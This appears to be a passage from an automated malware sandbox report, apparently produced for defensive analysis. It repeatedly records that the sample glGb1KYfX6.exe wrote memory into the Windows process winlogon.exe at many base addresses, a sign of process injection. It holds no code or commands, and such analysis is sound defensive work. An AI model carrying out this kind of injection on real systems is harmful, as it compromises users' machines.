Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C956000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C958000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C960000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C961000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C974000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C976000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C978000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C980000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C981000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C994000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C996000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C998000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9A0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9A1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9B4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9B6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9B8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9C0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9C1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9D4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9D6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9D8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9E0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9E1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9F4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9F6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9F8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA00000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA01000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA14000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA16000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA18000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA20000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA21000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA34000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA36000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA38000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA40000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA41000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA54000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA56000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA58000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA60000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA61000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA74000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA76000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA78000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA80000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA81000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA94000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA96000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA98000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAA0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAA1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAB4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAB6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAB8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAC0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAC1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAD4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAD6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAD8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB00000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB01000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB14000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB16000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB18000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB20000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB21000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB34000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB36000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB38000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB40000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB41000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB54000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB56000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB58000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB60000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB61000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB74000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB76000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB78000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB80000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB81000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB94000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB96000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB98000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC00000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC01000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC14000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC16000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC18000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC20000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC21000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC34000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC36000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC38000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC40000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC41000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC54000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC56000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC58000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC60000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC61000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC74000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC76000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC78000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC80000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC81000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC94000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC96000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC98000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD00000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD01000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD14000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD16000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD18000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD20000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD21000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD34000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD36000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD38000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD40000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD41000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD54000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD56000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD58000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD60000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD61000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD74000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD76000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD78000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD80000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD81000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD94000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD96000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD98000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE00000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE01000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE14000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE16000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE18000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE20000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE21000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE34000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE36000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE38000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE40000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE41000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE54000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE56000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE58000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE60000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE61000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE74000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE76000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE78000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE80000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE81000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE94000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE96000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE98000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CED4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CED6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CED8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF00000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF01000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF14000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF16000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF18000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF20000Jump to behavior
